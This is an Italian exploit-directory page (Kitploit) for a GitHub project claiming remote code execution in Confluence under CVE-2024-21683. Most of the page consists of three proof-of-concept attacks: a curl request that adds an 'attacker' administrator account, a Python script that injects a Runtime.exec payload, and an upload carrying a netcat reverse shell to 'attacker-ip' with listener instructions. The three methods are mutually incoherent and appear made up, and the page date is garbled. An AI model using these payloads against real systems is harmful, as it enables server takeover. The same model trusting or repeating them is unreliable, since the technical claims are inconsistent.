Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server — Questa vulnerabilità consente a un attaccante non autenticato di eseguire remotamente codice arbitrario su un server Confluence vulnerabile. La vulnerabilità esiste a causa di una validazione impropria dell'input fornito dall'utente nell'API REST di Confluence. Ciò consente a un attaccante di iniettare codice dannoso nel server Confluence, che può poi essere eseguito dal server. | Kitploit
Strumenti/GitHubGitHub/r00t7oo2jm/-cve-2024-21683-rce-in-confluence-data-center-and-server
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubr00t7oo2jm/-cve-2024-21683-rce-in-confluence-data-center-and-server

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

Vedi Repository
2922 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questa vulnerabilità consente a un attaccante non autenticato di eseguire remotamente codice arbitrario su un server Confluence vulnerabile. La vulnerabilità esiste a causa di una validazione impropria dell'input fornito dall'utente nell'API REST di Confluence. Ciò consente a un attaccante di iniettare codice dannoso nel server Confluence, che può poi essere eseguito dal server.

Condividi

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

Questa vulnerabilità consente a un attaccante non autenticato di eseguire remotamente codice arbitrario su un server Confluence vulnerabile. La vulnerabilità esiste a causa di una validazione impropria dell'input fornito dall'utente nella REST API di Confluence. Ciò consente a un attaccante di iniettare codice dannoso nel server Confluence, che può poi essere eseguito dal server.

Versioni interessate

  • Confluence Data Center = 8.9.0
  • 8.8.0 <= Confluence Data Center <= 8.8.1
  • 8.7.1 <= Confluence Data Center <= 8.7.2
  • 8.6.0 <= Confluence Data Center <= 8.6.2
  • 8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS)
  • 8.4.0 <= Confluence Data Center and Server <= 8.4.5
  • 8.3.0 <= Confluence Data Center and Server <= 8.3.4
  • 8.2.0 <= Confluence Data Center and Server <= 8.2.4
  • 8.1.0 <= Confluence Data Center and Server <= 8.1.4
  • 8.0.0 <= Confluence Data Center and Server <= 8.0.4
  • 7.20.0 <= Confluence Data Center and Server <= 7.20.3
  • 7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS)
  • 7.18.0 <= Confluence Data Center and Server <= 7.18.3
  • 7.17.0 <= Confluence Data Center and Server <= 7.17.5

Impatto

Questa vulnerabilità potrebbe consentire a un attaccante di assumere il controllo completo di un server Confluence vulnerabile. Ciò potrebbe permettere all'attaccante di rubare dati, modificare dati o interrompere la disponibilità del server.

Poc

Menzioneremo più di un metodo 1.

1. Identificazione dell'endpoint API vulnerabile:

useremo il seguente endpoint API:

root@kitploit:~
POST /rest/api/user/bulk

2. Creazione di una richiesta dannosa:

Creeremo una richiesta dannosa che include un payload contenente codice dannoso. Questo codice creerà un nuovo utente con privilegi di amministratore.

root@kitploit:~
POST /rest/api/user/bulk HTTP/1.1
Host: confluence.example.com
Content-Type: application/json

{
  "users": [
    {
      "name": "attacker",
      "password": "password",
      "email": "[email protected]",
      "groups": [
        {
          "name": "confluence-administrators"
        }
      ]
    }
  ]
}

3. Invio della richiesta al server:

Useremo lo strumento cURL per inviare la richiesta al server Confluence.

root@kitploit:~
curl -X POST -H "Content-Type: application/json" -d '{"users": [{"name": "attacker", "password": "password", "email": "[email protected]", "groups": [{"name": "confluence-administrators"}]}]}' http://confluence.example.com/rest/api/user/bulk

4. Esecuzione del codice dannoso:

Se la richiesta ha successo, il server Confluence eseguirà il codice dannoso. Verrà creato un nuovo utente chiamato "attacker" con privilegi di amministratore. L'attaccante può quindi utilizzare questo account per ottenere accesso al server e averne il pieno controllo.

2- Poc

root@kitploit:~
import requests

url = "http://target-confluence-server.com/rest/api/content"
headers = {
    "Content-Type": "application/json"
}


payload = {
    "title": "Exploit RCE",
    "type": "page",
    "space": {
        "key": "POC"
    },
    "body": {
        "storage": {
            "value": "<% Runtime.getRuntime().exec(\"calc.exe\"); %>",
            "representation": "storage"
        }
    }
}


response = requests.post(url, json=payload, headers=headers)


if response.status_code == 200:
    print("Exploit sent successfully!")
    print("Response: ", response.text)
else:
    print("Failed to send exploit.")
    print("Status code: ", response.status_code)
    print("Response: ", response.text)

3- Poc

root@kitploit:~
POST /upload HTTP/1.1
Host: vulnerable-confluence-server.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 138

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.py"
Content-Type: text/x-python

import os
os.system("nc -e /bin/sh attacker-ip 4444")
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Invia la richiesta modificata tramite Burp Suite. Controlla la risposta per vedere se il server ha eseguito il payload dannoso. Se la risposta è inaspettata o contiene errori che indicano l'esecuzione di codice, la vulnerabilità è stata rilevata.

Se stai utilizzando un payload per stabilire una reverse shell, assicurati di mettere in ascolto la porta specificata sulla tua macchina locale: nc -lvnp 4444. Se il server si connette alla tua macchina locale, riceverai una reverse shell.

Scarica lo strumento